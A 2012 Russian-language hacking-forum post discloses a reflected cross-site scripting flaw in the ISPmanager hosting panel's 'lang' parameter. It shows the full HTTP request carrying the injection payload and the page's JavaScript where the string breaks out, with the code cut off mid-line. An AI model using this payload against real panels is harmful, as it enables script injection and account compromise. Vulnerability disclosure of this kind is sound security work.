| Pirotexnik |
10.07.2012 16:56 |
[Intro] Доброго времени суток.
Ковырял бложек, наткнулся на сабж. В сабже ХСС.
[PoC] http://s1.ipicture.ru/uploads/201207...b/6zSZ4NFn.png
Код:
Code:
GET /manager/ispmgr?lang=";alert("PWNED+BY+p1r0!");// HTTP/1.1
Cookie: PHPSESSID=nblmvs0lg0bfgvhu0uk4l1r2t5; ads=4815162342; ground=0; best=5; ispmgr4=aqua:ua:0
Host: site.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
Код:
Code:
var imgpath = '/manimg/aqua/';
document.write( "" );
var binary = "/manager/ispmgr";
function setThemeLang () {
var theme = "aqua";
var lang = "";alert("PWNED BY p1r0!");//";
for ( var i=0; i
Офф сайт разрабов: http://ispsystem.com/ru/ |
